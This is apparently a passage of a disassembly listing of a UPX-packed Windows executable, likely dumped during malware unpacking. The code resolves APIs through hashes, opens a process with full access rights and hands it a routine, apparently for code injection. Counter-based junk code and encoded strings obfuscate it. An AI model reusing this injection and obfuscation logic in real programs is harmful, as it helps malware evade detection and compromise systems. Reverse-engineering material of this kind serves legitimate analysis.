add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push ebx
call eax
test eax, eax
jz short loc_402BBC
cmp dword_404104, 44h
jge short loc_402B61
inc dword_404104
loc_402B61: ; CODE XREF: sub_402951+208�j
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
mov [ebp+var_18], edi
mov edi, [ebp+arg_4]
push 6
mov [ebp+var_10], eax
mov [ebp+var_C], 2
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_18]
push ecx
push ebx
push edi
call eax
mov edi, [ebp+arg_4]
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push edi
call eax
mov eax, dword_404104
add eax, 0FFFFFFBAh
cmp eax, 0AAh
ja short loc_402BBC
inc dword_404104
loc_402BBC: ; CODE XREF: sub_402951+1D3�j
; sub_402951+1FF�j ...
cmp dword_404104, 4Ch
jge short loc_402BCB
inc dword_404104
loc_402BCB: ; CODE XREF: sub_402951+272�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_40323C
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401485
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_402C7C
mov eax, dword_404104
add eax, 0FFFFFFADh
cmp eax, 75h
ja short loc_402C13
inc dword_404104
loc_402C13: ; CODE XREF: sub_402951+2BA�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402C7C
push ebx
push esi
push offset sub_4027D7
call sub_402481
add esp, 0Ch
cmp dword_404104, 0Bh
jl short loc_402C4E
inc dword_404104
loc_402C4E: ; CODE XREF: sub_402951+2F5�j
cmp dword_404104, 0EDh
jle short loc_402C64
mov dword_404104, 1Fh
loc_402C64: ; CODE XREF: sub_402951+307�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
jmp short loc_402C7C
; ---------------------------------------------------------------------------
loc_402C77: ; CODE XREF: sub_402951+1E�j
call sub_401BFB
loc_402C7C: ; CODE XREF: sub_402951+2AD�j
; sub_402951+2DD�j ...
cmp dword_404104, 8Ch
jge short loc_402C8E
inc dword_404104
loc_402C8E: ; CODE XREF: sub_402951+335�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
loc_402C9F: ; CODE XREF: sub_402951+168�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_402951 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402CB0 proc near ; CODE XREF: sub_401485+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_402CC4: ; CODE XREF: sub_402CB0+29�j
cmp ecx, eax
jb short loc_402CD2
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_402CD2: ; CODE XREF: sub_402CB0+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_402CC4
sub_402CB0 endp
; ---------------------------------------------------------------------------
align 4
dd 0C9h dup(0)
dword_403000 dd 77E73167h ; DATA XREF: sub_401485+280�r
; sub_401BFB+12C�r ...
dword_403004 dd 77E76A2Eh ; DATA XREF: sub_401485+1D4�r
; sub_401485+245�r ...
dword_403008 dd 77E74672h ; DATA XREF: sub_401485+151�r
; sub_401485+19D�r
dword_40300C dd 77E74155h ; DATA XREF: sub_401485+29E�r
; sub_401786+80�r ...
dd 0
dword_403014 dd 77D4C96Ah ; DATA XREF: sub_401BFB+F1�r
; sub_401BFB+652�r ...
dd 0
dword_40301C dd 39A979C8h, 1DDCCC39h, 3939B9h ; DATA XREF: sub_401117+B9�o
dword_403028 dd 2939D8A8h, 0B91D1909h, 3939h ; DATA XREF: sub_401117+AA�o
dword_403034 dd 69196988h, 1DB8A919h, 3939B9h ; DATA XREF: sub_401117+9B�o
; sub_401BFB+14�o
dword_403040 dd 0F8E9C8F8h, 39B91D69h, 39h ; DATA XREF: sub_401117+8C�o
dword_40304C dd 0E998B9E9h, 0DCCC69F8h, 3939B91Dh, 0 ; DATA XREF: sub_401117+7D�o
dword_40305C dd 0C8D8A998h, 1D190969h, 3939B9h ; DATA XREF: sub_401117+57�o
dword_403068 dd 18h ; DATA XREF: sub_401485+289�o
dword_40306C dd 79C998C8h, 1DB8C809h, 0A978A9h ; DATA XREF: sub_401485+209�o
dword_403078 dd 0ECD8A998h, 6Ch ; DATA XREF: sub_401786+6B�o
dword_403080 dd 2CB9699Dh, 0 ; DATA XREF: sub_401BFB+7B5�o
dword_403088 dd 0B909C99Dh, 2CDCA9h ; DATA XREF: sub_401BFB+6E5�o
dword_403090 dd 0A8ADh ; DATA XREF: sub_401BFB+638�o
dword_403094 dd 69E85868h ; DATA XREF: sub_401BFB+5EF�o
; ---------------------------------------------------------------------------
cwde
loc_403099: ; CODE XREF: UPX0:0040309F�j
cdq
enter 29F8h, 1Dh
clc
jns short loc_403099
or al, 0E9h
mov ecx, 0B9E92C98h
cwde
mov esp, cs
lodsb
popf
leave
or [ecx+2CECA9h], edi
loc_4030B4: ; DATA XREF: sub_401BFB+55E�o
fprem
mov eax, 0A939h
loc_4030BB: ; DATA XREF: sub_401BFB+4EF�o
add al, bl
enter 0FFFFB8C9h, 0B9h
; ---------------------------------------------------------------------------
db 0E9h, 1Dh, 0F8h
dd 0F879h
dword_4030C8 dd 998F8C8h, 0D8590989h, 0F879F81Dh, 0 ; DATA XREF: sub_401BFB+483�o
dword_4030D8 dd 69E95929h, 0F81D59D9h, 0F879h ; DATA XREF: sub_401BFB+417�o
dword_4030E4 dd 8899E9E8h, 0F81D29D8h, 0F879h ; DATA XREF: sub_401BFB+3AB�o
dword_4030F0 dd 4919B909h, 0B8898879h, 79F81DB9h, 0F8h ; DATA XREF: sub_401BFB+33F�o
dword_403100 dd 59B998E8h, 5889h ; DATA XREF: sub_401BFB+2E5�o
dword_403108 dd 5CC9h ; DATA XREF: sub_401BFB+2A3�o
; sub_401BFB+36E�o ...
dword_40310C dd 0D8596969h, 8968E858h, 0F81D8939h, 0E90CF879h, 0E92C98B9h
; DATA XREF: sub_401BFB+271�o
dd 0CC8C98B9h, 0ACh
dword_403128 dd 3A5CC9h ; DATA XREF: sub_401BFB+23A�o
; sub_401BFB+5A9�o
dword_40312C dd 0F8B8B879h, 680D0D5Ch, 0F8891989h, 0E9B9A8B8h, 69D91D69h
; DATA XREF: sub_401BFB+220�o
dd 0D8F80D58h, 0DC88909h, 0C989B998h, 0DB88829h, 0
dword_403154 dd 0F8B8B879h, 680D0D5Ch, 0E8686889h, 68A9E8B8h, 49791DF8h
; DATA XREF: sub_401BFB+216�o
dd 9D8F80Dh, 980DC889h, 29C989B9h, 0DB888h
dword_403178 dd 4978C93Ah, 0A91D6869h, 0A978h ; DATA XREF: sub_401BFB+1C4�o
dword_403184 dd 2978A83Ah, 1D596888h, 0A978A9h ; DATA XREF: sub_401BFB+1AA�o
dword_403190 dd 4959D93Ah, 78A91DC8h, 0A9h ; DATA XREF: sub_401BFB+190�o
dword_40319C dd 8909293Ah, 78491998h, 78A91D78h, 0A9h ; DATA XREF: sub_401BFB+176�o
dword_4031AC dd 0C909793Ah, 78A91DA9h, 0A9h ; DATA XREF: sub_401BFB+15C�o
dword_4031B8 dd 0C879F83Ah, 78A91D19h, 0A9h ; DATA XREF: sub_401BFB+142�o
dword_4031C4 dd 6898593Ah, 2998B959h, 0A978A91Dh, 0 ; DATA XREF: sub_401BFB+122�o
dword_4031D4 dd 0B9ADh ; DATA XREF: sub_401BFB+DF�o
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
db 5Ch, 3Ah, 0
dword_4031DC dd 19D8A949h, 0DCCC39A9h, 3939B91Dh, 0 ; DATA XREF: sub_401BFB+50�o
; ---------------------------------------------------------------------------
loc_4031EC: ; DATA XREF: sub_401BFB+36�o
test al, 0C8h
test eax, 1DDCCCD8h
mov ecx, 3939h
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
db 0A9h
dd 0FA89A8D9h, 699869D8h, 0A989A939h, 0
dword_40320C dd 39B9B819h, 39B91D39h, 39h ; DATA XREF: sub_402481+104�o
dword_403218 dd 0E92BB81Bh, 0A9699AF8h, 0CA990B88h, 69B8C9A9h, 1909h
; DATA XREF: sub_402481+E9�o
dword_40322C dd 0C998C83Ah, 0B8C80979h, 0A978A91Dh, 0 ; DATA XREF: sub_4027D7+99�o
dword_40323C dd 39F878A9h, 0D8A9D809h, 0A978A91Dh, 36Eh dup(0)
; DATA XREF: sub_402951+C7�o
; sub_402951+285�o
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402429+F�o
; sub_402951+17A�o
align 4
dd 3Ah dup(0)
dword_404104 dd 38h ; DATA XREF: sub_401117+6�r
; sub_401117+F�w ...
dword_404108 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401117+51�o
; sub_401117+77�o ...
byte_404208 db 1 ; DATA XREF: sub_401301+24�r
; sub_401301+67�w
byte_404209 db 1 ; DATA XREF: sub_401301:loc_40131C�r
; sub_401301+32�w
align 4
dword_40420C dd 0 ; DATA XREF: sub_4027D7+102�o
; sub_4027D7+122�r
dword_404210 dd 0 ; DATA XREF: sub_4027D7+11C�r
; sub_4027D7+139�r
align 2000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 58h, 2000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 20140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 23F00000h, 0C060901h, 620062Fh, 2 dup(6090609h), 18120F0Dh
dd 6020280Dh, 60C1927h, 92B0F08h, 31090C08h, 340C0609h
dd 0C22600Ch, 18160950h, 650C0609h, 294C250Ch, 8101C0Eh
dd 828133Dh, 13104816h, 16063C20h, 50103F24h, 1657640Eh
dd 0C060971h, 524D0C5Ah, 3F0C0609h, 1A220675h, 812123Ah
dd 9091329h, 0B0C0C06h, 1A1A1A15h, 0E441A1Ah, 32371A0Ah
dd 3D2F5A42h, 3A323A32h, 3A353A32h, 809354Bh, 45150649h
dd 102B3815h, 2E153919h, 0C06093Dh, 61B6530h, 4E1A220Ch
dd 13060709h, 2F0F3408h, 150F1514h, 3E11415Ah, 92C1453h
dd 6381553h, 1B0C4716h, 16120506h, 8810410Dh, 0E15150Bh
dd 6090E24h, 173D2E0Ch, 4B09260Eh, 10090610h, 240E1515h
dd 0C06090Eh, 50000C22h, 4C000045h, 0AF000401h, 464DFDh
dd 0
dd 0E0000000h, 0B010200h, 801h, 1Eh, 0Ch, 51000000h, 29h
dd 10h, 30h, 4000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 40000h, 1000h, 10h, 1000h, 10h, 10000000h
dd 2 dup(0)
dd 4C000000h, 3C000032h, 7 dup(0)
dd 0D8000050h, 1, 0Ch dup(0)
dd 1C000030h, 6 dup(0)
dd 2E000000h, 74786574h, 0DB000000h, 1Ch, 10h, 1Eh, 4
dd 2 dup(0)
dd 20000000h, 2E600000h, 74616472h, 0FA000061h, 2, 30h
dd 4, 22h, 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 1C000000h, 2, 40h
dd 4 dup(0)
dd 40000000h, 2EC00000h, 6F6C6572h, 1A000063h, 2, 50h
dd 4, 26h, 2 dup(0)
dd 40000000h, 420000h, 0A4000050h, 4A000032h, 50h, 512Fh
dd 615D6761h, 334F5314h, 0FA4547FFh, 887BB6Eh, 31B3BD00h
dd 0A4299DBEh, 7F196399h, 0F95CE37Bh, 5A575708h, 0DB85D88Bh
dd 0CD974F74h, 5C85C80h, 0FD6816BCh, 85F61FCDh, 3EFDC943h
dd 51FC4D8Dh, 68FC7553h, 9E6FA842h, 8776CAD8h, 0EB135616h
dd 6076F94Ch, 6A1EE66Dh, 7D357700h, 0FB0DF016h, 38FF6AEEh
dd 3EB0D568h, 3482872h, 0ADF858FFh, 585F2DAEh, 96592A6Ah
dd 400214C2h, 3BD98341h, 30C0F6FBh, 0F802C183h, 2FEB7C6Fh
dd 11345FA3h, 106B611Eh, 18B80D5Bh, 61FE4813h, 0AC1CD9C9h
dd 6819828Dh, 774393E8h, 93757C2Eh, 80BB372Eh, 0FCE86F53h
dd 66BBF64Eh, 909B8A9Fh, 56A8AC4h, 2351F4ECh, 796D742h
dd 0EC212210h, 9D8B691h, 7E5342E5h, 58513802h, 63FBBDD4h
dd 0F445F78Ch, 860FFF45h, 0C9BF1F5Eh, 43E3BBF6h, 85B48B66h
dd 36F68539h, 85C80C35h, 0E36F1230h, 0EC981B14h, 0A268AF34h
dd 10681F56h, 0DD4BB65Ch, 539C0004h, 4F8DF87Eh, 0FB5056FEh
dd 31093B6Eh, 0C75AF875h, 16C9680Ch, 5AB9189Fh, 0EC01B6DBh
dd 0F00504CFh, 720220B3h, 0A2B6CF18h, 79F59A01h, 0C817F648h
dd 219168F0h, 0D39E4FBh, 75D67DFEh, 8B3856ACh, 74080635h
dd 19D6FF50h, 47F3777Bh, 0E9BD805Ah, 850F3A10h, 0FEEA0C4Dh
dd 5CA59993h, 0F08B2A40h, 804E01EBh, 7B7C35BCh, 5C0EFE1Bh
dd 0FFFFF575h, 7E424B15h, 0BD586A4Ah, 0DB2CD24Ch, 2727DF44h
dd 30AFA93Dh, 7C0EDB82h, 8DDA29E9h, 70796431h, 3650B1BBh
dd 0E0857904h, 0EF84531Fh, 3615DC23h, 7DA17D07h, 0D83DF6C0h
dd 0AD81E44Ah, 57C2D360h, 85D86C1Fh, 0F707FF21h, 76A8A94h
dd 0E151E812h, 21DB9199h, 8BB416h, 27B23CFCh, 7470BB9Bh
dd 74835773h, 9BBB3760h, 51FFD334h, 33597303h, 70AC613Ah
dd 0BB00FDC8h, 0C2A3687Fh, 2AE6B03Fh, 680C1D57h, 20E4E9EDh
dd 9CCB18DEh, 921A8B4Bh, 426357DBh, 58831DB2h, 76F730B3h
dd 39023401h, 0A7820F05h, 49AFF52Eh, 3DB47901h, 818400A9h
dd 7CCAC7B7h, 33532208h, 3DED25DBh, 65A53AE1h, 2FC1B7Fh
dd 0E045C7ECh, 0E3207D0h, 28E8DCBh, 545659EBh, 2D53F784h
dd 6827FF84h, 534D481h, 7589036Ah, 8C5833E8h, 0FA22E9C6h
dd 0C2E2DC29h, 78C80E49h, 336AF784h, 836139DFh, 0E46ED2DBh
dd 0DF6C0559h, 0E36C7E18h, 9D3D1879h, 0AEA396ECh, 593DD768h
dd 5CCC3F08h, 6200F592h, 7DBD6603h, 0ED6023F6h, 0F68957B8h
dd 0F4753F1Ch, 60F2031Bh, 0A8FD02A6h, 0B668953Dh, 78F61C6Ch
dd 4D1AD09Ch, 2E0FE57h, 1908E30h, 506182Ch, 45835B64h
dd 756B9E5Fh, 3761815Dh, 5CE027FCh, 8940572Fh, 994FC7Dh
dd 0D3DD083Fh, 20216866h, 888DECA8h, 2F0CFBFFh, 0D9C368DCh
dd 0F578FDEh, 321D3B87h, 54D1B349h, 0BB6E5EBh, 0F23EB6B0h
dd 68BB3D0Bh, 0E9F8F114h, 42B6CA01h, 80689DDBh, 0BE53571Ah
dd 9C405860h, 0C596D86h, 0A3F0F556h, 4FB421FBh, 62A6C830h
dd 0A5BE2129h, 2D869D88h, 0FB43568Fh, 3EDB678Eh, 9538A03Dh
dd 81F771C0h, 0FC77DAE2h, 0EBD06CB3h, 74C33A64h, 0C368CC65h
dd 810F3FD1h, 0DB2EEB26h, 0D8D7DC60h, 0F049DC3Fh, 0E61B0B7Bh
dd 8A797C7Fh, 0D8DBAC7Ch, 20397608h, 66F39777h, 6E42E40h
dd 0ADFB1BDBh, 74F6191Bh, 0FEC057EBh, 0B403FE3Dh, 0BF759B05h
dd 105D8809h, 28B104EBh, 9C80267Bh, 0D4748575h, 81B281E8h
dd 0C68FA54h, 57D014FBh, 0D859A411h, 4D6AF910h, 0D2D93AABh
dd 25997922h, 2BBE3D25h, 859E47E1h, 688001ACh, 0AEF7CBF1h
dd 362CC251h, 0E1CEF0E4h, 34B09C68h, 0E4D8E45Bh, 0D7F0E1Fh
dd 1ADC85C8h, 3BEC55F6h, 0F12FC2ADh, 0F74DC55h, 7D05E4D5h
dd 0B80E3809h, 0AEDBA56Ch, 226AB2BCh, 0F9590CB0h, 2204D6B2h
dd 1D1D932Fh, 0DD47B43Dh, 42E1068Dh, 0EB430445h, 85743A51h
dd 49E319FFh, 0FAA5C281h, 406A3B77h, 0DB88458Dh, 5BB827E8h
dd 3544841Bh, 318AC7E2h, 1B352B46h, 0C8EA54CBh, 3700FD84h
dd 0E5172E6Ah, 34A4C06h, 1DC26483h, 74FFC8D6h, 0AD5F62B8h
dd 0A0607233h, 0AF88BF34h, 57E8C051h, 74A35343h, 0D84C8C21h
dd 57EC21C8h, 47DC0C19h, 0E580352Fh, 0C3B95A87h, 2FF06F75h
dd 42EAD1DDh, 2EC2832Eh, 0C17CC13Bh, 16813811h, 7AB4208Dh
dd 5D969C62h, 1B427321h, 0A3A54D33h, 61861856h, 0B30D7BC0h
dd 67ECB765h, 9722D830h, 0ED67ECDEh, 67D8C8E3h, 74D8EDB6h
dd 0DBD42802h, 0F9B61759h, 56B82AD8h, 182A14E5h, 8132031h
dd 7819C1BBh, 1FECE470h, 3D8BC4D1h, 5CF52B21h, 4856311Ah
dd 1F9ED7FEh, 19167213h, 0AC5819B8h, 20360C8Ch, 9C0D3368h
dd 80C84D80h, 3199078h, 88C83232h, 0C98840Bh, 0A20C8C8h
dd 5C67A878h, 81669FE2h, 419DC7Dh, 190631F4h, 0D9EA6890h
dd 0C243213h, 76EFD02h, 76C2F03Ah, 7459F8A1h, 0FB1D8BE0h
dd 0B65EC74Bh, 6A0AE0FFh, 0EB545123h, 393B2431h, 2C756320h
dd 1903FC48h, 1903910Dh, 5064FD28h, 61D82DC9h, 362FD30Ch
dd 0B3AFEB8h, 0C19C8C8h, 0B766D319h, 34C015ECh, 8207212Bh
dd 8361B3Bh, 253108C3h, 84D9DE56h, 755B050Bh, 0C73715Ah
dd 6032320h, 0E9770100h, 0E9BD8160h, 811D1811h, 59322E7Ch
dd 6F0200Dh, 0CA0B0DC1h, 7218365Eh, 6B4B6C91h, 36BC0A88h
dd 1E43204h, 90036E63h, 986BEC03h, 9002EC8Bh, 0E4D768D8h
dd 0C919002h, 2B678C8h, 9BC00E3h, 2072456Eh, 0DAA80C57h
dd 5C8C810h, 9B6B03B4h, 24E4B836h, 58127FA3h, 0F0289E0h
dd 0DC3B4910h, 894F6C8Ch, 0B16E0D14h, 0E2ACE049h, 901F3828h
dd 92BFA32Ch, 18E26894h, 70D72701h, 321C0683h, 339F573Dh
dd 932B7C59h, 2BB59D6Ch, 7C69F802h, 0D009BCEBh, 48BF1335h
dd 0E4EC790h, 0F16E059h, 0F86050D0h, 37FFD68Ah, 1D040ADCh
dd 0F97D809Dh, 0ED458800h, 45C60675h, 0B35130EFh, 16B7B615h
dd 0F1304F9h, 0F15CF6EFh, 41932F22h, 1616FAADh, 34979E3Dh
dd 595EE617h, 8FFCFCD2h, 4C8CD3Ch, 0EEECFD17h, 0DC1904FDh
dd 0EE2DB086h, 1800EC29h, 805A00F0h, 76C358Ch, 37388F5h
dd 0D594B079h, 0E590C93Dh, 276BB6Dh, 8A0B8B66h, 0E578E484h
dd 0BFC0A166h, 7430E66Dh, 0E6658803h, 76AE38C5h, 8F926596h
dd 0D97A0D0Dh, 41BA4196h, 0E4E7FC4Dh, 46D92E79h, 0E8E4CFE4h
dd 2B1E0404h, 500B8019h, 0A94204C1h, 25F8B6D2h, 21F680CCh
dd 2B19688Fh, 5B7F9590h, 0A31B4C12h, 0F0DFBFBDh, 0E85781F0h
dd 18608BBFh, 0EB00302Eh, 812C6832h, 0FD931297h, 0D000CBB7h
dd 267402EAh, 9972F568h, 4A68143Dh, 0E8C13412h, 1A570503h
dd 1F8B7168h, 5FC574F1h, 0C8C25E8Ah, 0B1937C52h, 0F201085h
dd 5F67B7ECh, 3C48BA88h, 11AFC803h, 418DFB89h, 0FED52E8Ch
dd 38708B18h, 0BDC4D89h, 94E475CBh, 2E4067F1h, 638C27CEh
dd 0B06A08Bh, 7E567A36h, 0C209AFFFh, 57A6567Fh, 1BDFF781h
dd 3CE783FFh, 6EAC0F99h, 3D4B9CC4h, 25B78B90h, 0D97A99BCh
dd 56F7EF0Ah, 0D089CD53h, 37F6C33Bh, 75B50DC5h, 17C93207h
dd 943068CEh, 0F02405CDh, 5B5582h, 874925AFh, 5AD24B05h
dd 2F7A232Dh, 123424E1h, 0B918225Ah, 15D9BC45h, 9760183h
dd 640C2216h, 6802FEDCh, 1FC0EAEEh, 0ABF08B11h, 0EE6701F0h
dd 0FA1651BCh, 0B3F0228Dh, 15593750h, 0F301B3E4h, 0C616C7E0h
dd 2F0C4682h
dd 7D8BA1E0h, 85533F63h, 674161E8h, 483DA1EAh, 0B86C23B1h
dd 81AD8AA4h, 42A34004h, 0A37E176h, 14499B63h, 0CAEC4D03h
dd 0C1147C0Bh, 3D0E1C5Bh, 151362D5h, 0D1B6A358h, 8B7C67EDh
dd 20D72BD6h, 7DDF893Fh, 897FF838h, 334411Fh, 8D3898C7h
dd 810975BEh, 78B0678h, 37FB6909h, 6B03E35Ah, 2408BEDh
dd 1A0C4103h, 0C17106EBh, 8C07FFDh, 664001EBh, 0FA751839h
dd 6B054040h, 9D1B5F2Ch, 5AD1B46Ah, 4719A8CFh, 2E5F5F52h
dd 812D2DC7h, 0E80AB9FFh, 7B5BFF3Bh, 0E489F8ECh, 3A0C498Bh
dd 0FC1154ACh, 3A40088Ah, 7FED74CBh, 8030FFF9h, 773F0F9h
dd 3C9B60Fh, 300FEBD1h, 0C10FE183h, 0CE0B10E1h, 7B1DE10Eh
dd 0ECBE566Bh, 75260A01h, 7825A6D9h, 473F15F6h, 0A4EE3DF7h
dd 752B5147h, 0DD5BFF84h, 71087593h, 75FE8B10h, 74B3683Bh
dd 48F6E618h, 53B994D2h, 2B270CFAh, 6C37D018h, 0AD3DEE22h
dd 0C0994BF8h, 0E02F6895h, 96AAA1Dh, 81AD1592h, 24027BF0h
dd 7CAD9F09h, 10DC10E5h, 0BD89C823h, 0CACAD87Ch, 521FFDA0h
dd 0F8B33DC7h, 0DCC83864h, 0CD95678Eh, 24024277h, 0DA6E522Ch
dd 0D5186721h, 408A6C6Ch, 0B2629A9h, 57254C50h, 0E4305CD0h
dd 53438F93h, 9629644Ah, 0E831E306h, 0DFE1AAA8h, 8FAA2D70h
dd 6FB89AF0h, 0D853FF33h, 1049201Ah, 6357B83Bh, 400BB6B0h
dd 8D062914h, 0B26E9853h, 4AAB247Fh, 6749A137h, 724B7E04h
dd 0B4E96E75h, 59051FFEh, 544606F0h, 49287E1Eh, 0BCD0ABF3h
dd 0B6DBB857h, 3605FB60h, 6694DEA7h, 0C0E2E817h, 0B05D24CBh
dd 3D2E2E8Ah, 0AF66C38Eh, 0AFF9E522h, 0B6CC357Eh, 0B10C7040h
dd 0B75864B8h, 5703B60Bh, 35FFB789h, 9B05101Ah, 0CDDBB32h
dd 6AFB0B25h, 16177D14h, 0F61A498Bh, 3B681C63h, 0C87B88BFh
dd 30FE36Dh, 985E9F9Ah, 768AA260h, 55871A53h, 77CE2D70h
dd 85A3CCFh, 0DD019DB3h, 0B9FC11C4h, 76910AD5h, 2216088h
dd 0F580C03h, 3DDBF342h, 1DBF7EB8h, 0E257012Eh, 6F3EBE25h
dd 42B3886Dh, 0C933BF8Dh, 8D157462h, 0EEC52D2Fh, 10C50D94h
dd 39C7A80h, 3B41FC7Dh, 0A250BEEBh, 8B9725C8h, 20B811h
dd 5DDA90Bh, 65FA7EA5h, 0EC6C7078h, 4518B35h, 0FE59FC2Dh
dd 65726F10h, 849D172h, 2E41C80Bh, 0B68F44B6h, 0C2106522h
dd 0B09485Ch, 0AFCCA142h, 1C7A2EDh, 755B87EBh, 3CA7C87Dh
dd 42AFABF3h, 0C8905EACh, 5AF93C09h, 3BFC4272h, 757459F3h
dd 0E39FAD77h, 530A042Fh, 1F0FFF68h, 0C1743072h, 45850D90h
dd 0D7177417h, 6321325Ch, 1FED0B67h, 918650FAh, 9B1C5790h
dd 26418707h, 9268CB31h, 0A0EF208Eh, 89AD0597h, 7493790Dh
dd 773EB46Ch, 0DA393542h, 27EAD111h, 0B03D112Fh, 80DBBE07h
dd 3FC18828h, 0CE73A96h, 0A6206A51h, 442C3C0Fh, 2192B411h
dd 4921A710h, 0F893F682h, 1B3D12B9h, 6CF26935h, 51F8DA0Ch
dd 0D06AD7E6h, 1C217D44h, 0B42608B8h, 2ADDA0B2h, 2167DCBDh
dd 7DD74C7Ah, 0E596380Ch, 0CF66B46Eh, 775602F4h, 29A39CC2h
dd 204953AFh, 5F180BEFh, 3DBA78D6h, 106931AAh, 4C390C22h
dd 0A190BDC2h, 4C7CA190h, 2683B10h, 0F70BB5EBh, 8C962C09h
dd 7F7A8CEDh, 0C2F64F81h, 0CC000Ch, 244C8D51h, 0C01BC8BFh
dd 0FF23D0F7h, 0C8E2D952h, 0F02CC48Bh, 8B0A7203h, 8B9459C1h
dd 12AA5A26h, 0F92DBA0Bh, 8147EC82h, 0DB209D85h, 0EDFE0000h
dd 79C8A0FFh, 0CC3939A9h, 5B91DDCh, 39D8A800h, 0FB190929h
dd 0AC7DBB1h, 19698800h, 0CB8A901h, 0F8E9C8F8h, 5DF1669h
dd 0E9003F73h, 300C98B9h, 0D8A99800h, 0FB7B69C8h, 183460DDh
dd 0C998C80Fh, 37C80979h, 1BA978A9h, 0F77BFF6Eh, 9D136CECh
dd 2B2CB969h, 0B909C99Dh, 0AD0ADCA9h, 0FFDD77A8h, 58680BDFh
dd 999869E8h, 1D29F8C8h, 0CF879F8h, 8C032C55h, 0A866ACCCh
dd 0EC23632Fh, 39B8F8D9h, 0FD9F5D42h, 0B8C9FBDDh, 5B24E9B9h
dd 890998F8h, 0DD85909h, 0B7290000h, 59F93FD9h, 59D969E9h
dd 8899E9E8h, 410B29D8h, 0FEDF4919h, 8879ED60h, 0E8283789h
dd 8959B998h, 5CC93F58h, 64370000h, 6969CADFh, 3989687Ah
dd 1F007889h, 0FFDBB6D6h, 0B879003Ah, 0D5CF8B8h, 8919200Dh
dd 0F779A881h, 0FEDDBFBDh, 0D5869D9h, 0C878D8F8h, 0C989460Dh
dd 0DB88829h, 56FFB27Bh, 0FB682793h, 68A9E8B8h, 49791DF8h
dd 0C22DDB26h, 78C93A3Fh, 0A686949h, 1378A80Bh, 0B766DB68h
dd 3A0C59B1h, 16C849B4h, 7632290Bh, 986DD861h, 0F7878AEh
dd 0BA9C93Dh, 1F90F6B6h, 19C879F8h, 0A83D9859h, 0B6CD029h
dd 0B9430EC1h, 6B49CBAFh, 63A1612Fh, 0A88F39A6h, 160D10C8h
dd 0CA0FFE16h, 0D9A9BBA9h, 0D8FA89A8h, 894C6969h, 0C77041E5h
dd 1AB81937h, 2BB81BCBh, 0FDA14338h, 88A9699Ah, 662A990Bh
dd 6FB567C6h, 0C0206Eh, 939F806h, 2A0C53D8h, 670FE048h
dd 24041900h, 0AA9B228Bh, 7F090080h, 58222E79h, 736C0120h
dd 0C8637274h, 70E41F67h, 706D4179h, 6C144169h, 4FFE6E65h
dd 74617DB3h, 14653141h, 72707377h, 66746E69h, 0E7FFF20Fh
dd 23F00113h, 0C060901h, 620062Fh, 120F0D09h, 0FFFFBBFEh
dd 20280D18h, 0C192760h, 2B0F0806h, 90C0809h, 0C342231h
dd 500C2260h, 0FF181609h, 0BEFFFFFh, 4C250C65h, 101C0E29h
dd 28133D08h, 10481608h, 63C2013h, 103F2416h, 57640E50h
dd 0DDEEFFF7h, 5A207116h, 6524D0Ch, 2206753Fh, 12123A1Ah
dd 9132908h, 0FFFDFE0Eh, 150B0C7Bh, 0E44001Ah, 32371A0Ah
dd 3D2F5A42h, 35013A32h, 0B5354B3Ah, 66DFFFBBh, 45150649h
dd 102B3815h, 2E153919h, 65302D3Dh, 0FFB5041Bh, 4E3EBFFFh
dd 13060709h, 2F0F3408h, 150F1514h, 3E11415Ah, 92C1453h
dd 0B7DC2853h, 4770BB7Fh, 1205200Ch, 10410D16h, 0E155888h
dd 0B7340E24h, 39DFDB61h, 9260E17h, 10C7104Bh, 5000B512h
dd 897FC87Fh, 14CE845h, 0FDAF0004h, 0E0464Dh, 0EB0B0102h
dd 1DB359Eh, 0C1E0C08h, 4295113h, 96C10310h, 0D30AFB3h
dd 4020B40h, 0E92D9D33h, 600C0766h, 0E2CB101Eh, 72B9B25h
dd 1CB98206h, 324CCB24h, 1D8503Ch, 20175903h, 2E1E1CA7h
dd 0F35EF7D8h, 74786574h, 0EB9024DBh, 6DB92304h, 0CD205DDCh
